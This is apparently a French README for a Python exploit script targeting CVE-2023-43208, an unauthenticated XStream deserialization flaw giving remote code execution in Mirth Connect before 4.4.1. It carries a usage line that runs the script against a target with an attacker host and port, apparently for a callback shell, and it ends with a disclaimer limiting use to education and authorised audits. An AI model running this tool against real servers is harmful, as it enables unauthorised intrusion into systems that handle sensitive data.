
Exploitation Python de CVE-2023-43208 Mirth Connect RCE (XStream non authentifié)
Cet exploit exploite une vulnérabilité critique de désérialisation dans le moteur XStream de Mirth Connect. Elle découle d'un correctif incomplet pour la CVE-2023-37679, permettant l'exécution arbitraire de code non authentifiée sur toutes les versions antérieures à la 4.4.1.
python3 mirth_rce.py https://{cible} <hôte_attaquant> <port_attaquant>
Ce script d'exploit est destiné strictement à des fins éducatives et à des audits de sécurité autorisés afin d'aider les défenseurs à atténuer la CVE-2023-43208 ; toute utilisation de cet outil contre des cibles non autorisées est illégale et relève de la seule responsabilité de l'utilisateur final. L'auteur fournit ce logiciel « tel quel » sans aucune garantie, décline toute responsabilité en cas d'utilisation abusive ou de dommages, et ne cautionne ni n'encourage les activités non autorisées. Utilisez-le à vos propres risques et uniquement dans le respect des lois applicables.